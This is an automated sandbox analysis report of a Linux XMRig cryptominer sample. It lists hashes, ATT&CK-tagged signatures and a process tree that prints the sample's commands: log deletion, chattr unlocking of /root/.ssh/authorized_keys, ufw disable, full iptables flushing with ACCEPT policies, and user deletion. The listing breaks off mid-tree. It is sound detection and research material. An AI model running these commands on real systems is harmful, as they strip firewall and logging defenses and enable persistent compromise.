xmrig_linux | 7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5

Analysis

max time kernel
8s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
29-09-2024 11:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Size

27KB
MD5

fe70c19936ef32efb00f3c75ea90e701
SHA1

461514742ae77741e53efb6975ffd8d3db264c92
SHA256

7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5
SHA512

dad1271c0984f3120dc0c35725212fdccf707b4c3e5ecc6b1fe9e5ba95b295398d17fdac46c767375268fb1577128d23aa519ebfabc881a3b11e78de1b6a8f4b
SSDEEP

384:G7pQQwQHDf6jlpTWg3vMGQiKMvh/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeD:G7JoFNcDvFLcIwgiYq0xzBWjzr2W

Score

10^/10

xmrig_linux defense_evasion discovery evasion execution miner persistence privilege_escalatio privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

pid	Process
3025
3034

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Clear Linux or Mac System Logs

T1070.002

Processes:

description	ioc	Process
File deleted	/var/log/syslog	rm

Executes dropped EXE 1 IoCs

Processes:

ioc	pid	Process
/usr/bin/salt-store	3039

Flushes firewall rules 1 TTPs 3 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

Processes:

ufwiptables

pid	Process
1475	ufw
1650	iptables
2980

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

Processes:

modprobe

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1479	modprobe

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

Processes:

sudo

pid	Process
1651	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsiptablesip6tablesxargsxargsxargsxargsiptablesxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsiptablesxargsxargsxargsxargsxargsiptablesip6tablesxargsxargsxargsiptablesiptablesip6tablesxargsxargsip6tablesip6tablesxargsxargsiptablesxargsxargsxargsxargsxargs

pid	Process
2112	xargs
2288	xargs
2577
2946
1525	iptables
2613
2914
1604	ip6tables
2197	xargs
2294	xargs
2482	xargs
2601
2019	xargs
2593
1555	iptables
1768	xargs
1813	xargs
1849	xargs
1929	xargs
3017
1714	xargs
2495	xargs
2545
2565
2573
2009	xargs
2033	xargs
2335	xargs
1934	xargs
1994	xargs
2323	xargs
2519	xargs
1496	iptables
1828	xargs
2048	xargs
2137	xargs
2473	xargs
2377	xargs
2557
1563	iptables
1608	ip6tables
1798	xargs
2144	xargs
2181	xargs
1491	iptables
1526	iptables
1624	ip6tables
2209	xargs
2463	xargs
1612	ip6tables
1636	ip6tables
1904	xargs
2043	xargs
2589
1494	iptables
1699	xargs
1738	xargs
2629
2599
2811
2864
1681	xargs
1818	xargs
1969	xargs

Creates/modifies Cron job 1 TTPs 22 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.MBL5sb
File opened for modification	/var/spool/cron/crontabs/tmp.S5jaC2
File opened for modification	/var/spool/cron/crontabs/tmp.e6QZR7
File opened for modification	/var/spool/cron/crontabs/tmp.zGIcM9
File opened for modification	/var/spool/cron/crontabs/tmp.JvBX4c
File opened for modification	/var/spool/cron/crontabs/tmp.Sp02W8
File opened for modification	/var/spool/cron/crontabs/tmp.7DCX8c
File opened for modification	/var/spool/cron/crontabs/tmp.2HMGhf
File opened for modification	/var/spool/cron/crontabs/tmp.4uFFl1
File opened for modification	/var/spool/cron/crontabs/tmp.NHBhW5
File opened for modification	/var/spool/cron/crontabs/tmp.F1A5T4
File opened for modification	/var/spool/cron/crontabs/tmp.mtUcga
File opened for modification	/var/spool/cron/crontabs/tmp.ICTYyd
File opened for modification	/var/spool/cron/crontabs/tmp.7eBEPe
File opened for modification	/var/spool/cron/crontabs/tmp.PMxtl7
File opened for modification	/var/spool/cron/crontabs/tmp.EgAcz6
File opened for modification	/var/spool/cron/crontabs/tmp.bZmjOa
File opened for modification	/var/spool/cron/crontabs/tmp.niRZUf
File opened for modification	/var/spool/cron/crontabs/tmp.hK50U2
File opened for modification	/var/spool/cron/crontabs/tmp.ikzJq5
File opened for modification	/var/spool/cron/crontabs/tmp.Uru6m4
File opened for modification	/var/spool/cron/crontabs/tmp.jlqbs8

Disables AppArmor 28 IoCs

Disables AppArmor security module.

Processes:

pid	Process
2976
2976
2981
2956
2969
2981
2981
2991
2956
2976
2956
2988
3004
2981
2981
2981
2956
2976
2988
2988
2956
2956
2993
2988
2988
2976
2976
2988

Disables SELinux 1 TTPs 1 IoCs

Disables SELinux security module.

defense_evasion

Disable or Modify Tools

T1562.001

Processes:

pid	Process
2955

Enumerates running processes
Discovers information about currently running processes on the system

Write file to user bin folder 2 IoCs

persistence

Processes:

description	ioc	Process
File opened for modification	/usr/bin/salt-store
File opened for modification	/usr/bin/salt-store

Changes its process name 1 IoCs

Processes:

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	2973

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pspspspspspskillpspskillpspspspspspspspspspspspspspspspspspspspgreppspspspskill

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

modprobe

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

pid	Process
1814	ps
2188	ps
2336	ps
2283	ps
1955	ps
2000	ps
2039	ps
2133	ps
1880	ps
1900	ps
2066	ps
2378	ps
1668	ps
1905	ps
1975	ps
2342	ps
2198	ps
2354	ps
1829	ps
1834	ps
1980	ps
2166	ps
1860	ps
2216	ps
2076	ps
2108	ps
2256	ps
2313	ps
1890	ps
2044	ps
2118	ps
2251	ps
1915	ps
1940	ps
2020	ps
2025	ps
2261	ps
1809	ps
1910	ps
1930	ps
2010	ps
2277	ps
2348	ps
2005	ps
2034	ps
2171	ps
2231	ps
1970	ps
2098	ps
2271	ps
1799	ps
1945	ps
1990	ps
2123	ps
3008
2151	ps
2307	ps
2360	ps
2384	ps
1804	ps
1895	ps
2049	ps
2399	ps
2103	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspspspspspspspspspkillpspspspspspspspspspspspspspspgreppspspspspspspspspsps

description	ioc	Process
File opened for reading	/proc/84/cmdline
File opened for reading	/proc/451/cmdline	ps
File opened for reading	/proc/36/cmdline	ps
File opened for reading	/proc/1326/status	ps
File opened for reading	/proc/538/stat	ps
File opened for reading	/proc/1066/cmdline	ps
File opened for reading	/proc/484/cmdline	ps
File opened for reading	/proc/1135/status	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/538/cmdline
File opened for reading	/proc/32/stat	ps
File opened for reading	/proc/25/status	ps
File opened for reading	/proc/492/cmdline	pkill
File opened for reading	/proc/1469/status	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/455/status
File opened for reading	/proc/1182/stat	ps
File opened for reading	/proc/1155/cmdline
File opened for reading	/proc/484/status
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/1096/status
File opened for reading	/proc/1073/status	ps
File opened for reading	/proc/1154/stat	ps
File opened for reading	/proc/1086/cmdline	ps
File opened for reading	/proc/1066/stat	ps
File opened for reading	/proc/1140/stat	ps
File opened for reading	/proc/1326/status	ps
File opened for reading	/proc/1137/status	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/1073/stat	ps
File opened for reading	/proc/1144/status
File opened for reading	/proc/592/status
File opened for reading	/proc/1169/status
File opened for reading	/proc/416/status
File opened for reading	/proc/164/cmdline	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/1179/cmdline	ps
File opened for reading	/proc/437/status	pgrep
File opened for reading	/proc/334/status
File opened for reading	/proc/27/cmdline	ps
File opened for reading	/proc/443/stat	ps
File opened for reading	/proc/1132/status
File opened for reading	/proc/492/cmdline
File opened for reading	/proc/592/status
File opened for reading	/proc/451/cmdline
File opened for reading	/proc/159/stat
File opened for reading	/proc/1171/stat	ps
File opened for reading	/proc/1279/status
File opened for reading	/proc/1466/cmdline
File opened for reading	/proc/1057/status	ps
File opened for reading	/proc/521/status	ps
File opened for reading	/proc/1115/cmdline	ps
File opened for reading	/proc/23/status
File opened for reading	/proc/1151/cmdline
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/172/cmdline	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/81/status
File opened for reading	/proc/83/status
File opened for reading	/proc/2579/cmdline
File opened for reading	/proc/1157/cmdline
File opened for reading	/proc/940/status	ps

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

modprobegrepgrepgrep

pid	Process
1479	modprobe
1992	grep
2022	grep
2243	grep
2773

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

description	ioc	Process
File opened for modification	/tmp/log_rot	fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1471
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1472
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:1473
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:1474
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1475
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1476
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1477
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1478
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        System Network Configuration Discovery
        
        PID:1479
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1483
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1486
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1487
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1488
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1489
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1490
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1491
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1492
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1493
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      Attempts to change immutable files
      PID:1494
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1495
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      Attempts to change immutable files
      PID:1496
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1497
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1498
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1499
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1500
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1501
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1502
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1503
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1504
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1505
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1506
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1507
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1508
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1509
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1510
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1511
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1512
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1513
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1514
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1515
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1516
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1517
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1518
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1519
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1520
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1521
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1522
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1523
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1524
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1525
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      Attempts to change immutable files
      PID:1526
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1527
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1528
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1529
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1530
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1531
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1532
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1533
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1534
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1535
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1536
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1537
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1538
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1542
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1544
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1545
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1547
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1548
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1552
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1553
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1554
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:1555
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1556
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1557
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1560
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1562
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1563
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1568
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1569
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1570
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1571
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1572
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1573
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1574
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1575
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1576
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1577
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1578
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1579
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1580
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1581
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1582
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1583
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1584
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1585
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1586
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1587
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1588
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1589
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1590
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1591
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1592
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1593
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1594
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1595
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1596
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1597
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1598
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1599
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1600
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1601
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1602
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1603
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:1604
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1605
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1606
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1607
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      Attempts to change immutable files
      PID:1608
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1609
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1610
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1611
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      Attempts to change immutable files
      PID:1612
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1613
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1614
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1615
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1616
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1617
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1618
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1619
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1620
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1621
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1622
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1623
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      Attempts to change immutable files
      PID:1624
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1626
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1627
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1628
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1632
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1634
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:1636
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1638
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1649
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1650
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1651
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:1655
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:1659
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:1660
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:1664
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1665
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1666
- /bin/rm
  rm -rf /tmp/keys
  2⤵
